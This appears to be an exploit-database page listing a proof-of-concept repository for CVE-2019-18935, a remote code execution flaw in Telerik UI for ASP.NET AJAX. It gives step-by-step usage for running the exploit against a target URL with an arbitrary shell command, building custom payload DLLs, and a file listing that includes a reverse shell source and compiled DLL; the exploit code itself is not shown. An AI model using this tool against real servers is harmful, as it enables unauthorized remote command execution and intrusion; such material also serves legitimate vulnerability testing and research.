CVE-2019-18935 PoC — Progress Telerik UI for ASP.NET AJAX 代码问题漏洞

Source

Associated Vulnerability

Description

Exploit for CVE-2019-18935

Readme

# CVE-2019-18935 Exploit

Remote Code Execution exploit for Telerik UI ASP.NET AJAX through deserialization vulnerability.

## How to Run

### Step 1: Clone the Project
```bash
git clone https://github.com/menashe12346/CVE-2019-18935.git
cd CVE-2019-18935
```

### Step 2: In `CVE-2019-18935.py`, modify line 15:

```python
version = "2017.1.228"  # Replace with target server's Telerik version
```

### Step 3: Run the Exploit

```bash
python CVE-2019-18935.py <target_url> <shell_command>
# Example:
python CVE-2019-18935.py http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau "whoami"
```

🔧 **Building Custom DLL Files**

To create a DLL from a different C file (not just reverse shell):

Install Visual Studio (Desktop development with c++) with these components:

- MSVC v143 - VS 2022 C++ x64/x86 build tools
- Windows 11 SDK
- C++ CMake tools for Windows
- C++ AddressSanitizer

Build the DLL:

```bash
build-dll.bat your_file.c
```

The DLL will be created in the `payloads/` directory.

📋 **File Descriptions**

```
CVE-2019-18935_exploit/
├── CVE-2019-18935.py        # Main exploit code
├── RAU_crypto.py            # Telerik encryption/decryption module
├── build-dll.bat            # Script to build DLL files from C code
├── reverse_shell.c          # C source code for reverse shell
└── payloads/                # Directory for Compiled DLL payload files
```

---

File Snapshot

 [4.0K]  /data/pocs/c1d949f059b352f00033ed7f56af9a5a28563fe9
├── [1.9K]  build-dll.bat
├── [4.9K]  CVE-2019-18935.py
├── [4.0K]  payloads
│   └── [110K]  reverse_shell.dll
├── [ 14K]  RAU_crypto.py
├── [1.4K]  README.md
└── [1.6K]  reverse-shell.c

2 directories, 6 files

Remarks